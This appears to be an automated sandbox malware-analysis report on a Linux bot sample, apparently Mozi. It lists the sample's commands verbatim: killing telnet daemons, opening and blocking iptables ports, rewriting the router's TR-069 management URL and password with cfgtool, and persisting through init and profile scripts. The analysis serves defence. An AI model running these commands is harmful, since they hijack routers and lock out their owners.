                Source: /bin/sh (PID: 4814)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4823)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4846)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4894)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4920)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4944)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4948)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4957)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4980)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5032)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5053)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5080)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5107)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5135)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5149)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5172)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5186)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5227)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5249)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5252)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
                Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /proc/4596/mountsJump to behavior
                Sample tries to persist itself using /etc/profileShow sources
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/profile.d/apps-bin-path.shJump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/profile.d/Z97-byobu.shJump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/profile.d/bash_completion.shJump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/profile.d/vte-2.91.shJump to behavior
                Sample tries to persist itself using System V runlevelsShow sources
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/rcS.d/S95baby.shJump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/rc.localJump to behavior
                Terminates several processes with shell command 'killall'Show sources
                Source: /bin/sh (PID: 4600)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/230/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/231/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/232/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/233/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/234/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3512/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/359/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1452/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3632/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3518/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/10/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1339/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/11/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/12/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/13/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/14/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/15/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/16/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/17/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/18/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/19/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/483/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3527/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3527/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/2/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3525/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1346/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3524/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3524/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/4/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3523/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/5/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/7/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/8/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/9/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/20/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/21/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/22/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/23/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/24/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/25/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/28/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/29/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1363/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3541/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3541/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1362/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/496/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/496/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/30/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/31/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/31/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1119/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3790/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3791/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3310/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3431/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3431/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3550/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/260/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/263/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/264/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/385/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/144/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/386/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/145/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/146/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3546/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3546/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/147/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3303/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3545/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/148/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/149/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3543/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/822/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/822/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3308/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3308/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3429/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3429/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/47/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/48/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/48/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/49/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/150/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/271/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/151/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/152/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/153/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/395/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/396/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/154/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/155/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/156/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/1017/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/157/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/158/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/159/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3432/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/3432/cmdline
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/50/stat
                Source: /usr/bin/killall (PID: 4600)File opened: /proc/51/stat
                Source: /tmp/KnAY2OIPI3 (PID: 4598)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                Source: /tmp/KnAY2OIPI3 (PID: 4632)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4666)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4669)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4700)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4724)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4748)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4767)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4774)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 4809)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4812)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4816)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4836)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4863)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                Source: /tmp/KnAY2OIPI3 (PID: 4873)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                Source: /tmp/KnAY2OIPI3 (PID: 4885)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4911)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4940)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4946)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4952)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 4970)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 5019)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 5022)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 5026)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 5045)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 5072)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 5100)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                Source: /tmp/KnAY2OIPI3 (PID: 5133)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 5139)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 5167)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 5177)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 5206)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 18022 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 5218)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 5245)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT"
                Source: /tmp/KnAY2OIPI3 (PID: 5250)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT"
                Source: /bin/sh (PID: 4635)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4668)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4707)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4733)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4754)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4772)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4811)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4814)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4823)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4846)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4894)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4920)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4944)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4948)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4957)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4980)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5024)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5032)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5053)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5080)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5107)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5135)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5149)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5172)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5186)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5227)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5249)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
                Source: /bin/sh (PID: 5252)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
                Source: /tmp/KnAY2OIPI3 (PID: 4623)Reads from proc file: /proc/statJump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File written: /usr/networksJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Drops files in suspicious directoriesShow sources
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/S95baby.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/mountall.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/checkfs.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/umountnfs.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/mountkernfs.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/bootmisc.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/checkroot.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/hwclock.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/hostname.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/mountdevsubfs.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/mountall-bootclean.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /etc/init.d/mountnfs.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /usr/bin/gettext.shJump to dropped file
                Source: /tmp/KnAY2OIPI3 (PID: 4596)File: /usr/sbin/alsa-info.shJump to dropped file
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 34784 -> 7574
                Source: /tmp/KnAY2OIPI3 (PID: 4577)Queries kernel information via 'uname':
                Source: /tmp/KnAY2OIPI3 (PID: 4596)Queries kernel information via 'uname':
                Source: /tmp/KnAY2OIPI3 (PID: 4619)Queries kernel information via 'uname':
                Source: /sbin/modprobe (PID: 4647)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 5315)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 5357)Queries kernel information via 'uname':
                Source: kvm-test-1-run.sh.8.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
                Source: functions.sh0.8.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                Source: kvm-test-1-run.sh.8.drBinary or memory string: kill -KILL $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                Source: kvm.sh.8.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_pid=$!
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                Source: kvm-recheck-lock.sh.8.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: kvm-test-1-run.sh.8.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: kvm.sh.8.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_append () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
                Source: functions.sh0.8.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                Source: kvm-test-1-run.sh.8.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
                Source: functions.sh0.8.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_args () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate -smp qemu argument.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                Source: functions.sh0.8.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                Source: kvm.sh.8.drBinary or memory string: --qemu-args|--qemu-arg)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                Source: functions.sh0.8.drBinary or memory string: echo $TORTURE_QEMU_CMD
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC=$2
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                Source: functions.sh0.8.drBinary or memory string: specify_qemu_cpus () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-ppc64
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
